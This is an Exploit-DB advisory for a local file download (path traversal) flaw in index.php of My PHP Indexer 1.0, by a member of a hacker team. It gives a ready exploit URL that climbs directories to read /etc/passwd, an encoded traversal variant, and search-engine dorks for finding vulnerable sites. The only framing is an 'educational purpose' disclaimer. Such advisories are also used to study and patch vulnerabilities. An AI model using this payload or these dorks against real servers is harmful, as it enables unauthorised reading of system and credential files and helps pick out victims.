My PHP Indexer 1.0 index.php Local File Download Vulnerability

ID EDB-ID:6740
Type exploitdb
Reporter JosS
Modified 2008-10-12T00:00:00


My PHP Indexer 1.0 (index.php) Local File Download Vulnerability. CVE-2008-6183. Webapps exploit for php platform

                                            # My PHP Indexer 1.0 (index.php) Local File Download Vulnerability
# url:
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site:
# team: Spanish Hackers Team - [SHT]
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

Depending the server configuration is possible 
that it doesn't allow us to scale directories.

vuln file: index.php

PoC:     /index.php?d=[DIR]&f=[FILE]
Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd

live demo:
[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)
[FILE] = index.php;

dork:     "Powered by My PHP Indexer 1.0"
dork (2): "priv8 :P"

# [2008-10-12]